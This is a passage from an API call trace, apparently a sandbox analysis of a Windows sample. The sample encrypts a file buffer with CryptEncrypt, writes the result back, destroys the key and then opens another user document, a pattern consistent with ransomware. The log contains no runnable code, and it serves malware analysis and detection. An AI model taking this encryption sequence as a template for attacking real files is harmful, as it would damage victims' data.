dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0079.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.760] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.760] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0079.761] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.761] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.761] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.761] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0079.761] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0079.761] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0079.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.761] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0079.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0079.762] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12013) returned 0x49d0068 [0079.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cafd0 [0079.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.764] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x12013, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x12020) returned 1 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.764] CharLowerBuffW (in: lpsz="byte[73761]", cchLength=0xb | out: lpsz="byte[73761]") returned 0xb [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.764] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0079.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb318 [0079.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb318, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.765] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d0068*, pdwDataLen=0x144e538*=0x12013, dwBufLen=0x12020 | out: pbData=0x49d0068*, pdwDataLen=0x144e538*=0x12020) returned 1 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0079.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.765] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.766] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x12020, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ef3c*=0x12020, lpOverlapped=0x0) returned 1 [0079.768] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.768] CryptDestroyKey (hKey=0x41ac740) returned 1 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0079.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.769] CryptReleaseContext (hProv=0x41a49d0, dwFlags=0x0) returned 1 [0079.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.769] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.769] CloseHandle (hObject=0x298) returned 1 [0079.769] CloseHandle (hObject=0x258) returned 1 [0079.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv", lpFilePart=0x0) returned 0x2f [0079.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\saj5q4jpz7.csv")) returned 0x20 [0079.772] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3c2c0, ftCreationTime.dwHighDateTime=0x1d5e967, ftLastAccessTime.dwLowDateTime=0xefd1a510, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0xefd1a510, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, 